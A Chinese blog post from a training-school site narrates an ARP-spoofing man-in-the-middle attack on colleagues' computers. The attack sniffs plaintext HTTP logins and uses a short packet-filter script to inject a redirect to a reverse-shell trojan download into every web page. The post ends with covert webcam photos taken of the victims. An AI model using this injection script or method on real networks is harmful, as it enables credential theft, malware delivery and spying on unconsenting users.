通过ARP欺诈中间人攻击黑掉公司一半的电脑
作者:强哥   类别:网络安全    日期:2019-11-01 19:09:57    阅读:2769 次   消耗积分:0 分

这次攻击能够得以实现完全感谢蜗牛学院的网管老师不绑定静态IP,蜗牛学院的系统开发人员使用HTTP协议,安全防御基本没有,这才使得本次攻击顺利实现。


对于这次攻击开始只是想搞掉一两台电脑,考虑公司大部分同事都使用的WIN7系统,首先便针对全公司网络中所有主机进行了MS17-010漏洞扫描,但在扫描过程中发现除两台Server2008的服务器和某咨询小姐姐的电脑存在这个漏洞外,同志们都非常非常注意,打上了该漏洞的补丁。


同志们都没有MS17-010的漏洞,那么,接下来考虑最简单粗暴直接有效的方法就是使用木马,但是木马使用要将木马安装在宿主机上,怎么让同事们安装就成了需要突破的难点。


在讲述攻击过程前,先来看两个概念:

ARP协议即Address Resolution Protocol地址解析协议,是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址

ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning),是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网上上特定计算机或所有计算机无法正常连线。


ARP欺诈中间人攻击流程:

当主机A和网关通讯时,A会查看自己的ARP缓存表,查找网关IP(192.168.199.1)和对应的MAC地址。如果ARP缓存表里没有网关的信息,则会广播询问谁是192.168.199.1,当主机A收到网关信息后更新自己的缓存表进行通讯。



20191101_190650_123.png


甜蜜的主机和网关遭遇了第三者的入侵。主机C告诉主机A,我是网关。主机C告诉网关我是主机A。于是本来A送玫瑰给网关结果却送到了C的手上,而C则把玫瑰换成了番茄酱送给了网关,而网关应该给A的钞票到了C手上变成薯条送给了A。



20191101_190700_440.jpg


这就是一个简单的中间人攻击。根据上述理论,KALI主机(192.168.199.137)冒充网关向外广播自己是199.1的网关机,并向网关冒充了被攻击的任意一台主机,当然这里需要提一句的是,由于woniuboss系统使用的是未加密的HTTP协议传输用户名密码,而HTTP协议是明文传输(就算有些系统做了数据加密也是在前端利用JS进行的加密)所以在攻击过程中只要有用户登陆,那么登陆用户的用户名和密码就能被拦截下来。接下来编写一个木马用于获取被宿主机的shell,木马反向连接KALI主机。编写JSP工程提供对当前木马的下载连接并启动TOMCAT。编写ARP脚本,篡改数据,脚本如下:

if (ip.proto == TCP && tcp.src == 80) {

 if (search(DATA.data, "<head>")) {

   replace("<head>", "<head><script>window.location.href='木马下载地址'</script>");

 }

}


添加了一个JS用于打开木马下载连接。被欺诈用户访问任意一个http网址都将被篡改数据到这个挂马页面下载木马,宿主机运行木马后得到shell,偷偷拍张照。




20191101_190713_998.jpg


OK,整个攻击过程结束。


为了答谢大家对蜗牛学院的支持,蜗牛学院将会定期对大家免费发放干货,敬请关注蜗牛学院的官方微信。


20190320_095757_834.jpg





   
版权所有,转载本站文章请注明出处:蜗牛笔记, http://www.woniunote.com/article/403
上一篇: 广东德生科技股份有限公司、成都洛瑞恩科技有限公司来蜗牛学院校招啦!
下一篇: 蜗牛学院程序员节上,我们给这几个小伙伴发了10000元现金红包~
提示:登录后添加有效评论可享受积分哦!
最新文章
    最多阅读
      特别推荐
      回到顶部